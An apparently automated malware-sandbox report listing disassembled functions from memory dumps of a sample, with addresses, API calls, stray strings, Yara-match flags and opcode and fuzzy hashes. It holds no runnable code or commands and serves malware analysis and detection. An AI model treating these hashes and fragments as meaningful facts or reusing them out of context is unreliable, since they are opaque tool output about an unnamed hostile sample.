Opcode ID: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
Instruction ID: b6730ddf130f4e2a19c05504fd255247e3d11648143caf2c2a016be5e81be571
Opcode Fuzzy Hash: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
Instruction Fuzzy Hash: 7B7112B1A043189FEB20CFA8D841BEEBBB1FB45304F10843DE905AB2C5D775590ACB89

Function 00429917 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A

Strings

67, xrefs: 00429C0E

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 67
API String ID: 237503144-1886922373
Opcode ID: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
Instruction ID: a5821a17d697f7f316c5e23e8fd2eb7e472b5f5b3478a77b5a5598d7e69c89e3
Opcode Fuzzy Hash: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
Instruction Fuzzy Hash: 6D61F0B66083408BD724DF29E88175FB7E1EBC9304F18493DE58997281DB35D905CB8A

Function 00429B7B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A

Strings

67, xrefs: 00429C0E

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 67
API String ID: 237503144-1886922373
Opcode ID: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
Instruction ID: 7ba92da05bbbaddbc1e3305b36c9b0db2ded0e94f959a81563e8173db3a816b3
Opcode Fuzzy Hash: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
Instruction Fuzzy Hash: A961FEB66083408FD724DF25D88176FBBE2EBC9304F19493DE5898B281DB75C805CB8A

Function 00437C10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00437C52
GetSystemMetrics.USER32 ref: 00437C62

Strings

, xrefs: 00437D4F

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
Instruction ID: 45907af0f9aaa3a0b9b12b1f6695193350465b50a920b4478e3ecda7c38bd9fb
Opcode Fuzzy Hash: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
Instruction Fuzzy Hash: 23C15BB05093808BE7B0DF64D99979BFBF1BB85308F10992EE5984B354C7B89449CF4A

Function 004437D0 Relevance: 4.4, Strings: 3, Instructions: 647COMMON

Download Yara Rule

Strings

>D, xrefs: 00443ED1
UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
Instruction ID: fc75cb93acbb787b45c4a477a4821f2fed63727632898f6dbcded6a89fb42fc6
Opcode Fuzzy Hash: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
Instruction Fuzzy Hash: 8E22FE3AA08310CFD314DF29E89072BB7E2FB8A315F4A887DD58987361E674D941CB85

Function 004438E0 Relevance: 4.3, Strings: 3, Instructions: 577COMMON

Download Yara Rule

Strings

>D, xrefs: 00443ED1
UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
Instruction ID: 5b6f0a5fe011b24c48fd64f61fb35041aa1557f3f4dce62c9b8353607a503f3b
Opcode Fuzzy Hash: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
Instruction Fuzzy Hash: 5402DD39A08310CFE314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85

Function 004438FB Relevance: 4.3, Strings: 3, Instructions: 566COMMON

Download Yara Rule

Strings

>D, xrefs: 00443ED1
UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
Instruction ID: 0ffe7b29edef83b041ea382641fdc4149dbc112461c51243b49d827887b3597f
Opcode Fuzzy Hash: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
Instruction Fuzzy Hash: 2202DD3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A2D675D945CB85

Function 004438F9 Relevance: 4.3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

Strings

>D, xrefs: 00443ED1
UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
Instruction ID: 86640fba6bac160b05b0c43110ab63d66e8f7ec2f5acf9dcdae8f0d28c6b6e57
Opcode Fuzzy Hash: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
Instruction Fuzzy Hash: 8002ED3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85

Function 020F25D7 Relevance: 4.2, Strings: 3, Instructions: 457COMMON

Download Yara Rule

Strings

-jkhanold~m`, xrefs: 020F2735
anold~m`, xrefs: 020F2741
d~m`, xrefs: 020F271C

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID: -jkhanold~m`$anold~m`$d~m`
API String ID: 0-185452761
Opcode ID: 07d2442547bbedbbbe6c066885c2d67aa08821165203c63c6e7e94bfc294603c
Instruction ID: 1d138b33dec07fe6041b449bc1c071e95449d886ca35cdb8be2c291e62352acf
Opcode Fuzzy Hash: 07d2442547bbedbbbe6c066885c2d67aa08821165203c63c6e7e94bfc294603c
Instruction Fuzzy Hash: 37D1ADB06483808FD754DF68C891B6BBBE0FF85318F14491CEA958B791E7B9D809CB52

Function 020F2AE7 Relevance: 4.2, Strings: 3, Instructions: 455COMMON

Download Yara Rule

Strings

27, xrefs: 020F2B9B
!', xrefs: 020F2B01
HJK, xrefs: 020F2F68

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID: !'$27$HJK
API String ID: 0-623214307
Opcode ID: 12ce45a36756b1f70682f7838d54c29fd27cb533d73a7c0cc1eee0f87610a5d7
Instruction ID: 53533c2baab899c4d17a4beccc033a1570f54ebb84713c6ee788f96350ac1bbe
Opcode Fuzzy Hash: 12ce45a36756b1f70682f7838d54c29fd27cb533d73a7c0cc1eee0f87610a5d7
Instruction Fuzzy Hash: 58C124B16483008FD755DF28CC9276BB7E2EF81324F19892CEE858B690E379D905D752

Function 00422880 Relevance: 4.2, Strings: 3, Instructions: 455COMMON

Download Yara Rule

Strings

27, xrefs: 00422934
!', xrefs: 0042289A
HJK, xrefs: 00422D01

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: !'$27$HJK
API String ID: 0-623214307
Opcode ID: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
Instruction ID: 5153aecd17f80642fd8c0eece016e91168ea77982d201b76830abc39117f0e9e
Opcode Fuzzy Hash: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
Instruction Fuzzy Hash: F5C156B57083109BD7149F29DD9276BB7E1EF81314F88852EE8C58B391E6BCD904C35A

Function 020FF97D Relevance: 4.1, Strings: 3, Instructions: 366COMMON

Download Yara Rule

Strings

Tx+, xrefs: 020FFFDE
bC, xrefs: 020FFF84
5, xrefs: 020FFEEA

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID: 5$Tx+$bC
API String ID: 0-2958649183
Opcode ID: 878d8cd2ffcbb237619de5602d15ed4e3526d5757278a69bfb0ca6ece5a1916c
Instruction ID: 181f43818fdac62acdd6dd2ba623873f8c42776f3cb24030b306d8a37df0b758
Opcode Fuzzy Hash: 878d8cd2ffcbb237619de5602d15ed4e3526d5757278a69bfb0ca6ece5a1916c
Instruction Fuzzy Hash: A5B1C27050C3C18AE779CF2984A47ABFFE0AF97304F18896DE1D987692D77A8405CB52

Function 0042F716 Relevance: 4.1, Strings: 3, Instructions: 366COMMON

Download Yara Rule

Strings

Tx+, xrefs: 0042FD77
bC, xrefs: 0042FD1D
5, xrefs: 0042FC83

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: 5$Tx+$bC
API String ID: 0-2958649183
Opcode ID: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
Instruction ID: 57781aab13a08c1a066b8e14d20b5adcd793598ba32206fb76d556f76c65c1e4
Opcode Fuzzy Hash: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
Instruction Fuzzy Hash: 66B1C17050C3918AE7358F2990643ABFFE0AF93304F98496ED5C987392D7794409CB56

Function 020FFDE4 Relevance: 4.1, Strings: 3, Instructions: 327COMMON

Download Yara Rule

Strings

Tx+, xrefs: 020FFFDE
bC, xrefs: 020FFF84
5, xrefs: 020FFEEA

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID: 5$Tx+$bC
API String ID: 0-2958649183
Opcode ID: 34f0093aad384b58f3953ed85f12a0e3001b075a516edd21357cc8b6ea9ea554
Instruction ID: e5d8d064ae71973748a61ffa08fe370d6848a1868748399789024f841ef1ab59
Opcode Fuzzy Hash: 34f0093aad384b58f3953ed85f12a0e3001b075a516edd21357cc8b6ea9ea554
Instruction Fuzzy Hash: 3FA1CF7050C3C18AE779CF2984A47ABFFE0AF97304F18896DE1D987692D7BA4405CB42

Function 0042FB7D Relevance: 4.1, Strings: 3, Instructions: 327COMMON

Download Yara Rule

Strings

Tx+, xrefs: 0042FD77
bC, xrefs: 0042FD1D
5, xrefs: 0042FC83

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: 5$Tx+$bC
API String ID: 0-2958649183
Opcode ID: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
Instruction ID: c6dbd191573f8eaa778921652fb4887c0da57f4868ba9d7cab245032b22be67a
Opcode Fuzzy Hash: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
Instruction Fuzzy Hash: D0A1C17050C3918AE739CF2994603EBBFE0AF96304F58897ED5C987392D7794409CB56

Function 020F829E Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

up, xrefs: 020F83BE
@-, xrefs: 020F83B3
vC, xrefs: 020F83C9

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID: @-$up$vC
API String ID: 0-1828384444
Opcode ID: 422b25fc84451906c3cd7cd792491071fe5ff7971ca24ee0d353181616b7cc8a
Instruction ID: f8445143057d41332cb4f4693dfb1463bfc2ef7e5c013aa0dbab50882746cf87
Opcode Fuzzy Hash: 422b25fc84451906c3cd7cd792491071fe5ff7971ca24ee0d353181616b7cc8a
Instruction Fuzzy Hash: BD412EB02497819FE3248FA1D894B9BBBE2BBC6344F148A2DE1D84B351D7788449CF57

Function 00430F54 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00430F85

Strings

Wu, xrefs: 00430F85

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: FreeLibrary
String ID: Wu
API String ID: 3664257935-4083010176
Opcode ID: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
Instruction ID: 7b7113e42e32beabe8c4c016577568230ad12c23f9774a4b5fe118adb1295c8a
Opcode Fuzzy Hash: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
Instruction Fuzzy Hash: 9531F33691C3D08BE3348F359C553EBBBE2ABC6314F19866DC8D857285DB7A1805CB86

Function 00430F4E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00430F85

Strings

Wu, xrefs: 00430F85

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: FreeLibrary
String ID: Wu
API String ID: 3664257935-4083010176
Opcode ID: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
Instruction ID: fb4d1f38de1a85f36896b77157d4be4448694684cc70b9096da98958b1763f09
Opcode Fuzzy Hash: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
Instruction Fuzzy Hash: D931F23695C3908BE3348F359C953DBBBE2ABC6314F19862DC8D817284DB7A1805CB86

Function 0042AF92 Relevance: 3.2, Strings: 2, Instructions: 719COMMON

Download Yara Rule

Strings

q, xrefs: 0042ADA6
HJK, xrefs: 0042AF20

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: HJK$q
API String ID: 0-1296910776
Opcode ID: 028d739358c52e8602972a09d323f6bdb4925b84f419e3085169aae73bae586d
Instruction ID: d2894ee3cd08ac16c3749e12b5b110520c9353356bc4cfd2bf9c021bc54d189f
Opcode Fuzzy Hash: 028d739358c52e8602972a09d323f6bdb4925b84f419e3085169aae73bae586d
Instruction Fuzzy Hash: B522F1B4608311CBD714CF64D8A176BB7F1FF96318F48896DE8854B391E7788906CB8A

Function 020E981D Relevance: 2.9, Strings: 2, Instructions: 363COMMON

Download Yara Rule

Strings

^\, xrefs: 020E9B3F
=, xrefs: 020E9A33

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID: =$^\
API String ID: 0-3808277151
Opcode ID: 5db4b892f095804ee284d38a4db250eddcc7e3951948645c0765905043076e92
Instruction ID: 654ce685d1de04c166fba28492aced4140c285b3659d0307d14ebb6f0ec0fa1e
Opcode Fuzzy Hash: 5db4b892f095804ee284d38a4db250eddcc7e3951948645c0765905043076e92
Instruction Fuzzy Hash: E0B1E4756083818FC729DF24C890BABBBE2EFC5315F08892CD4D68B781E7788845DB56

Function 004195B6 Relevance: 2.9, Strings: 2, Instructions: 363COMMON

Download Yara Rule

Strings

^\, xrefs: 004198D8
=, xrefs: 004197CC

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: =$^\
API String ID: 0-3808277151
Opcode ID: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
Instruction ID: 449fbb577030d5845b3ff3c78ea8df1dbbecff39a5bc4c3e86ed8d0a83d476b4
Opcode Fuzzy Hash: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
Instruction Fuzzy Hash: 20B1E6B56483428BD328DF25C8A07ABBBE1EFD5315F08892DE4D58B381E77C8845C796

Function 02114E87 Relevance: 2.8, Strings: 2, Instructions: 312COMMON

Download Yara Rule

Strings

HJK, xrefs: 02114FD5, 021150FD
Y\]R, xrefs: 0211508B

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID: HJK$Y\]R
API String ID: 0-1999428432
Opcode ID: 6f2147a5695bd4a53398488ea1253b7368f890971a7c40f09ff34ff683eb93e5
Instruction ID: 45aa47c4bc4aa4c909a7fd377fec4b7a62b01e86429b04a91fd5a179afc84bef
Opcode Fuzzy Hash: 6f2147a5695bd4a53398488ea1253b7368f890971a7c40f09ff34ff683eb93e5
Instruction Fuzzy Hash: C691E1716483119BD319DF28D88076BB7E3EBC5314F188A3CE89997390DB759909CB82

Function 00444C20 Relevance: 2.8, Strings: 2, Instructions: 312COMMON

Download Yara Rule

Strings

HJK, xrefs: 00444D6E, 00444E96
Y\]R, xrefs: 00444E24

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: InitializeThunk
String ID: HJK$Y\]R
API String ID: 2994545307-1999428432
Opcode ID: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
Instruction ID: 32cb53c941d059e59dbce30d87d00b37379897002de2ab33e1c58f8979392959
Opcode Fuzzy Hash: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
Instruction Fuzzy Hash: 6E910371A087118BE314CF29D89076BF7E2FBC5314F18862DE89597391DB79DC0A8786

Function 0042AFB0 Relevance: 2.7, Strings: 2, Instructions: 222COMMON

Download Yara Rule

Strings

q, xrefs: 0042ADA6
HJK, xrefs: 0042AF20

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: HJK$q
API String ID: 0-1296910776
Opcode ID: 6b5437a597b224c58c18eff0cd7f9e1b12adb8a3c204c60dfaa919d9716313ac
Instruction ID: bfd71d5ee42355939c062a028dadac58486c6c85aba871825f936092bfaa215d
Opcode Fuzzy Hash: 6b5437a597b224c58c18eff0cd7f9e1b12adb8a3c204c60dfaa919d9716313ac
Instruction Fuzzy Hash: AC5103B4604310CBD7209F24E85176B73E1FF85318F54456DE9898B3A1E739D92ACB8B

Function 020FAC89 Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

*, xrefs: 020FAE67
*, xrefs: 020FADFC, 020FACFA, 020FACC7

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID: *$*
API String ID: 0-899546507
Opcode ID: f755de3653f2c2b4c58075d169376b9a8ee94269c4aa6d6ea2e771727395f055
Instruction ID: 85e828159404ea38140b2b6e3eae779eeae70cb711d0c962846ff8a24547a3e5
Opcode Fuzzy Hash: f755de3653f2c2b4c58075d169376b9a8ee94269c4aa6d6ea2e771727395f055
Instruction Fuzzy Hash: F85190766083558FD718CF64D45435FBBE1EBC4308F058D2DE9EA9B281DBB899098BC2

Function 0043E6E0 Relevance: 2.0, Strings: 1, Instructions: 749COMMON

Download Yara Rule

Strings

XY, xrefs: 0043EBE7

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: XY
API String ID: 0-554446067
Opcode ID: 33b58009a0d275d92ce311614dd2e3f5199f03ee560553effbe1cdfd0aaf5a3f
Instruction ID: d641272ad35b4eeebbd9d600f92596cd8dd7c25af792fba6638ab3cd001d37ae
Opcode Fuzzy Hash: 33b58009a0d275d92ce311614dd2e3f5199f03ee560553effbe1cdfd0aaf5a3f
Instruction Fuzzy Hash: 3D322F3AA18351CBC7149F28D91236BB7E1EF8A300F09D97ED4C997291E7B8C945C786

Function 00414C30 Relevance: 1.6, Strings: 1, Instructions: 384COMMON

Download Yara Rule

Strings

"PA, xrefs: 00415014

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: "PA
API String ID: 0-2145937358
Opcode ID: bef77be7770c426e390176cbba11156bb761573cd05d219cd3a7b36ea03102e9
Instruction ID: f624a7b71cbf7b314e20e1a45d24be04a38f24c047e10d0676dafeec8f7fc991
Opcode Fuzzy Hash: bef77be7770c426e390176cbba11156bb761573cd05d219cd3a7b36ea03102e9
Instruction Fuzzy Hash: 5CA102B15183118BD7189F28D8627ABB3E1EFD2314F09892EE8C58B390F77C9945C796

Function 021011BB Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 021011EC

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d46930d8ea5d8e4c1fa930bb6d97d79fe89e2303350bbbf21d68262c0608e9e6
Instruction ID: 515d3a311094eac2f0ae36c51b03c82d462ce6005a22749a02a9cd3e8cb9e785
Opcode Fuzzy Hash: d46930d8ea5d8e4c1fa930bb6d97d79fe89e2303350bbbf21d68262c0608e9e6
Instruction Fuzzy Hash: EE31E4369583904BE7348F358C953EBBBE2ABC6314F198A6CC8D957285DB7A0805CB81

Function 021011B5 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 021011EC

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 1a694cecfd3be9603b07d6fb9acc2d21223d713bf2e364fe82ac352f710b0443
Instruction ID: 822734de72a375c273f97026b65f7d0f1ce55c71e2e7addbfb968dbdabc927a2
Opcode Fuzzy Hash: 1a694cecfd3be9603b07d6fb9acc2d21223d713bf2e364fe82ac352f710b0443
Instruction Fuzzy Hash: C231B4769583908BE3348F359C953DBBBE2BBC6314F19862CC8D957284DB7A0805CBC1

Function 02114547 Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

HJK, xrefs: 021145F2, 02114790

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID: HJK
API String ID: 0-1783642877
Opcode ID: f9f340207ff99400aa1e8f7d0486ce8454284f6cb4ab257c27673f3fe4436c83
Instruction ID: 964dfe5d39f20398580d1b3bf9975c521aeab8927adc07eace9c9e6c2280738e
Opcode Fuzzy Hash: f9f340207ff99400aa1e8f7d0486ce8454284f6cb4ab257c27673f3fe4436c83
Instruction Fuzzy Hash: D69102316083818BD7149F19C850B2FB7E2FFC9728F158A7CE4D59B290D7359815CB86

Function 004442E0 Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

HJK, xrefs: 0044438B, 00444529

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: InitializeThunk
String ID: HJK
API String ID: 2994545307-1783642877
Opcode ID: dacedb78e00f7b3ea06162b8a930dfcecaa1b39c86591f60bbd6e03e633e71ac
Instruction ID: 5aabee4b8b26e2ec9a193049fa608abe716db33e51fa934c25155f6b19f8c581
